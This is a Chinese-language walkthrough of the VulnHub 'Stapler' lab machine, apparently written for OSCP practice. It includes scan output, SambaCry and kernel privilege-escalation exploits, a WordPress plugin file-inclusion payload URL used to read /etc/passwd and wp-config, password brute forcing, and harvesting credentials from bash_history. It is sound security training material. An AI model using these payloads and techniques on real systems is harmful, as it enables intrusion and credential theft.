Vulnhub-Stapler-1

这个同样是备考OSCP靶机清单中的其中一个

下载链接stapler

信息收集

nmap扫描结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 22:07 CST
Nmap scan report for 192.168.56.139
Host is up (0.00036s latency).

PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 9
| Capabilities flags: 63487
| Some Capabilities: Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, IgnoreSigpipes, SupportsTransactions, DontAllowDatabaseTableColumn, Support41Auth, LongPassword, InteractiveClient, Speaks41ProtocolOld, ConnectWithDatabase, SupportsLoadDataLocal, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: "s\x04xO\x1F%\x07j2<\x06i'j\x02 \x12t\x0B
|_ Auth Plugin Name: mysql_native_password
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7h39m57s, deviation: 34m38s, median: 7h59m57s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2020-06-19T23:07:17+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-19T22:07:18
|_ start_date: N/A

扫描目录后发现.bashrc和.profile 下载回来一看,我发现好像都没什么帮助的。

nikto 扫描

80端口的扫描看起来是没什么帮助的。所以再次扫描12380端口。

咦,nikto显示找到了两个路径

  • admin112233
  • blogblog

但是用http去无法访问,尝试用https成功

看起来是个wordpress博客

去看看admin112233
确定之后就被重定向到了xss payloads了

robots.txt

1
2
3
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

smb目录探测

尝试连接

在backup里面了找到了vsftpd.conf发现匿名用户的配置选项是打开的。先去看看ftp有什么东西


ftp目录中只有一个文件,其内容为:

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Elly,请确保您更新了有效负载信息。完成后,将其保留在您的FTP帐户中,约翰。

有效负载信息是什么?。。真是吃了文化的亏。。ftp匿名用户目录看起来没什么信息了,继续回去samba目录。
很可惜backup目录下的wordpress.tar.gz并不是网站的备份,只是一个安装包。

kathy_stuff目录下只有一个todolist,内容为

I’m making sure to backup anything important for Initech, Kathy

好像没什么线索了,,所以目前为止找到了Kathy,John,Elly,Harry,zoe这四个好像是目标服务器的中的用户名。

连接samba的tmp目录

只有一个ls文件,内容是

好像不会更新的。

到这里,smb和ftp的线索就断了。我被困住了,尝试检索服务器运行服务的版本的漏洞

sambacry 提权


符合目标版本的好像只有42084.rb.看了一下内容是CVE-2017-7494的漏洞编号而且是rb脚本,直接上msf。

提权成功。

这应该就是最轻松的提权方式了把。。。

尝试使用非msf框架的exp

下载地址:exp-joxeankoret-CVE-2017-7494
目标机器samba版本4.3.9利用不成功

exp42060 sambacry exp
同样也是不成功,,不会改(脚本小子就是脚本小子,真的废物

同样尝试了这个exp也是不成功

讲道理,感觉其他的exp也是能执行的啊。。为什么就msf的可以。难道是和我本机的环境有关?我暂且蒙在古里。想到这里,我又回去尝试了msf的exp,还是成功。我重新看了一下42060 sambacry exp的帮助命令,发现有一个参数。-x 看了这个参数之后,我就想是不是会和目标机器的系统架构有关,而这个脚本默认的是X8664的so文件,在32位的机器上无法执行。所以一直没有成功。想到这里 我将-x这个参数加上去了,结果就成功了。。。

。。此时只想喷自己是弱智

漏洞利用-拿webshell

使用wpscan扫描目标博客

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
wpscan --url "https://192.168.56.139:12380/blogblog/" --disable-tls-checks

[+] URL: https://192.168.56.139:12380/blogblog/ [192.168.56.139]
[+] Started: Sat Jun 20 04:02:20 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.18 (Ubuntu)
| - Dave: Soemthing doesn't look right here
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.56.139:12380/blogblog/xmlrpc.php
| Found By: Headers (Passive Detection)
| Confidence: 100%
| Confirmed By:
| - Link Tag (Passive Detection), 30% confidence
| - Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://192.168.56.139:12380/blogblog/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Registration is enabled: https://192.168.56.139:12380/blogblog/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.56.139:12380/blogblog/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.56.139:12380/blogblog/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
| Found By: Rss Generator (Passive Detection)
| - https://192.168.56.139:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
| - https://192.168.56.139:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
| Location: https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/
| Last Updated: 2019-12-08T00:00:00.000Z
| Readme: https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/readme.txt
| [!] The version is out of date, the latest version is 1.4.4
| Style URL: https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
| Style Name: BHost
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
| Author: Masum Billah
| Author URI: http://getmasum.net/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2.9 (80% confidence)
| Found By: Style (Passive Detection)
| - https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

wordpress 4.2.1好像并没有存在的exp。

https://192.168.56.139:12380/blogblog/xmlrpc.php 存在xmldos攻击。不过对我们好像没什么作用

https://192.168.56.139:12380/blogblog/wp-content/themes/bhost/readme.txt 点了一下,发现还有目录遍历

看了一下插件

搜索了一下,发现博客上面的advanced-video-embed-embed-videos-or-playlists插件版本是1.0并且存在文件包含。

看了一下大神构造好的payload

1
http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

修改成目标站点的uri就好了
尝试包含/etc/passwd,如果包含成功则会在上传目录下添加一个jpeg文件,并且首页会添加一个新的文章。


下载目标文件,cat查看

1
wget https://192.168.56.139:12380/blogblog/wp-content/uploads/2084215694.jpeg --no-check-certificate #不检查ssl证书

成功包含!,我觉得现在可以尝试包含wp-config。看数据库的帐号密码。对照着在smb共享目录中找到的wordpress.tar.gz知道wp-config.php不在wp-admin目录下,在blogblog的根目录下。(因为解压出来有个wp-config-sample.php)

登录数据库成功。

查看一些配置信息

因为写文件的相关配置是空的,所以代表我们可以任意写文件到指定路径

蚁剑连接成功(要先关闭https证书检查

到这里我们已经获得了webshell了。是真的累。。

爆破wordpress用户密码

观察结果,无效用户名

确定用户名为john,并且没有设置重试次数。可以尝试爆破密码

爆破用户密码

登录之后尝试写一句话,但是不成功。因为主题模板文件不可写。。尝试安装主题也不行

看起来是没有给够权限。

提权-敏感信息泄露

对系统进行信息枚举后,发现一个特别的地方

这里的居然是root执行的,觉得有点奇妙,去这个用户的家目录查看后,发现bash_history可读

peter是uid1000的用户,他可能具有sudo权限。抱着这一想法,登录看看。

感觉是相对比较轻松的提权了。。

内核提权

查看系统内核信息后,发现是4.4.0.21内核的ubuntu系统

搜索exp库,好像还挺多的。有搞头?

排除掉x64和不符合的版本后,只剩下

  • 39772.txt
  • 43418.c
  • 47169.c
  • 44298.c

最后选择了39772.txt,漏洞编号:CVE-2016-4557。照着exp的说明去做,先运行compile.sh编译后,执行doubleput就可以拿到root权限了。这个漏洞还是谷歌的零日计划团队发现的Issue 808: Linux: UAF via double-fdput() in bpf(BPF_PROG_LOAD) error path

总结